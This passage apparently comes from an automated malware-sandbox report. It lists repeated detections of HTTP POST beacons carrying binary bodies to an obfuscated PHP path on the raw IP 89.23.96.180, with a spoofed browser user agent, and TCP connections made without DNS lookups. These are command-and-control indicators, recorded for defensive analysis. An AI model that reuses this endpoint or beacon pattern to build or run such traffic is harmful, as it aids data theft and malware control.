                              Source: global trafficHTTP traffic detected: POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 89.23.96.180Content-Length: 2112Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 89.23.96.180Content-Length: 2532Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 89.23.96.180Content-Length: 2536Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 89.23.96.180Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 89.23.96.180Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 89.23.96.180Content-Length: 2112Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 89.23.96.180Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 89.23.96.180Content-Length: 2536Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 89.23.96.180Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 89.23.96.180Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 89.23.96.180Content-Length: 2084Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 89.23.96.180Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 89.23.96.180Content-Length: 2536Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 89.23.96.180Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 89.23.96.180Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 89.23.96.180Content-Length: 2100Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 89.23.96.180Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 89.23.96.180Content-Length: 2536Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 89.23.96.180Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 89.23.96.180Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 89.23.96.180Content-Length: 2112Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 89.23.96.180Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 89.23.96.180Content-Length: 2536Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 89.23.96.180Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 89.23.96.180Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 89.23.96.180Content-Length: 2112Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 89.23.96.180Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 89.23.96.180Content-Length: 2536Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 89.23.96.180Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 89.23.96.180Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 89.23.96.180Content-Length: 2112Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 89.23.96.180Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 89.23.96.180Content-Length: 2536Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 89.23.96.180Content-Length: 2532Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 89.23.96.180Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 89.23.96.180Content-Length: 2112Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 89.23.96.180Content-Length: 2536Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 89.23.96.180Content-Length: 2536Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 89.23.96.180Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 89.23.96.180Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 89.23.96.180Content-Length: 2100Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 89.23.96.180Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 89.23.96.180Content-Length: 2536Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 89.23.96.180Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 89.23.96.180Content-Length: 2532Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 89.23.96.180Content-Length: 2112Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 89.23.96.180Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 89.23.96.180Content-Length: 2536Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 89.23.96.180Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 89.23.96.180Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 89.23.96.180Content-Length: 2112Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 89.23.96.180Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 89.23.96.180Content-Length: 2536Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 89.23.96.180Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 89.23.96.180Content-Length: 2532Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 89.23.96.180Content-Length: 2084Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 89.23.96.180Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: unknownTCP traffic detected without corresponding DNS query: 89.23.96.180
                              Source: unknownTCP traffic detected without corresponding DNS query: 89.23.96.180
                              Source: unknownTCP traffic detected without corresponding DNS query: 89.23.96.180
                              Source: unknownTCP traffic detected without corresponding DNS query: 89.23.96.180
                              Source: unknownTCP traffic detected without corresponding DNS query: 89.23.96.180
                              Source: unknownTCP traffic detected without corresponding DNS query: 89.23.96.180
                              Source: unknownTCP traffic detected without corresponding DNS query: 89.23.96.180
                              Source: unknownTCP traffic detected without corresponding DNS query: 89.23.96.180
